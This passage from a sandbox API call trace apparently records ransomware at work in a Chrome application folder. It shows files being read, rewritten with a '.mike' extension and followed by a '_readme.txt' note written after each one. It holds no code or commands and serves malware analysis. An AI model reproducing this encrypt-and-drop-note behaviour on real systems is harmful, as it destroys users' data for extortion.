ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3a589f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x442a)) returned 1 [0114.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0114.315] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0114.315] GetFileType (hFile=0x288) returned 0x1 [0114.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.315] GetFileType (hFile=0x288) returned 0x1 [0114.315] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0114.315] ReadFile (in: hFile=0x288, lpBuffer=0x2242900, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2242900*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0114.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.320] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0114.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0114.321] WriteFile (in: hFile=0x288, lpBuffer=0x225f2f0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x225f2f0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0114.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.322] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", dwFileAttributes=0x80) returned 1 [0114.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.324] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", lpFilePart=0x0) returned 0x59 [0114.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0114.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0114.324] WriteFile (in: hFile=0x288, lpBuffer=0x2262944*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af070, lpOverlapped=0x0 | out: lpBuffer=0x2262944*, lpNumberOfBytesWritten=0x2af070*=0x45e, lpOverlapped=0x0) returned 1 [0114.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0114.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0114.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0114.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0114.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.334] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.335] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png", lpFilePart=0x0) returned 0x5c [0114.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0114.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0114.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.336] WriteFile (in: hFile=0x288, lpBuffer=0x22664ac*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22664ac*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0114.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0114.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0114.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.341] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.342] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.344] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.344] WriteFile (in: hFile=0x288, lpBuffer=0x22870f0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22870f0*, lpNumberOfBytesWritten=0x2af02c*=0x750, lpOverlapped=0x0) returned 1 [0114.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0114.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0114.346] WriteFile (in: hFile=0x288, lpBuffer=0x228a348*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x228a348*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0114.346] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.347] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.mike", lpFilePart=0x0) returned 0x61 [0114.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.347] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png", dwFileAttributes=0x80) returned 1 [0114.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.348] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", lpFilePart=0x0) returned 0x59 [0114.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0114.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0114.349] WriteFile (in: hFile=0x288, lpBuffer=0x228da44*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af070, lpOverlapped=0x0 | out: lpBuffer=0x228da44*, lpNumberOfBytesWritten=0x2af070*=0x45e, lpOverlapped=0x0) returned 1 [0114.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0114.352] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.353] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", lpFilePart=0x0) returned 0x60 [0114.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.353] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png", lpFilePart=0x0) returned 0x5b [0114.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0114.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0114.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.354] WriteFile (in: hFile=0x288, lpBuffer=0x229155c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x229155c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0114.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0114.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0114.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", lpFilePart=0x0) returned 0x60 [0114.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0114.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0114.360] WriteFile (in: hFile=0x288, lpBuffer=0x22a31bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22a31bc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0114.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", lpFilePart=0x0) returned 0x60 [0114.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.mike", lpFilePart=0x0) returned 0x60 [0114.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.361] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png", dwFileAttributes=0x80) returned 1 [0114.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", lpFilePart=0x0) returned 0x59 [0114.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0114.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0114.363] WriteFile (in: hFile=0x288, lpBuffer=0x22a6894*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af070, lpOverlapped=0x0 | out: lpBuffer=0x22a6894*, lpNumberOfBytesWritten=0x2af070*=0x45e, lpOverlapped=0x0) returned 1 [0114.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0114.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.366] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", lpFilePart=0x0) returned 0x66 [0114.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.366] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png", lpFilePart=0x0) returned 0x61 [0114.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0114.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0114.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.367] WriteFile (in: hFile=0x288, lpBuffer=0x22aa4f0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22aa4f0*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0114.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0114.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0114.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0114.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0114.370] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", lpFilePart=0x0) returned 0x66 [0114.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0114.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0114.372] WriteFile (in: hFile=0x288, lpBuffer=0x22bbfb8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22bbfb8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0114.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", lpFilePart=0x0) returned 0x66 [0114.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.mike", lpFilePart=0x0) returned 0x66 [0114.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.373] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png", dwFileAttributes=0x80) returned 1 [0114.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.375] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\_readme.txt", lpFilePart=0x0) returned 0x59 [0114.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0114.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0114.376] WriteFile (in: hFile=0x288, lpBuffer=0x22bf738*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af070, lpOverlapped=0x0 | out: lpBuffer=0x22bf738*, lpNumberOfBytesWritten=0x2af070*=0x45e, lpOverlapped=0x0) returned 1 [0114.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.377] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xd76d960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd76d960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.377] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d53e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd6d53e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd6fb540, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x4650, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png.mike", cAlternateFileName="LOGOPN~1.MIK")) returned 1 [0114.378] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7216a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd7216a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd7216a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x5970, dwReserved0=0x0, 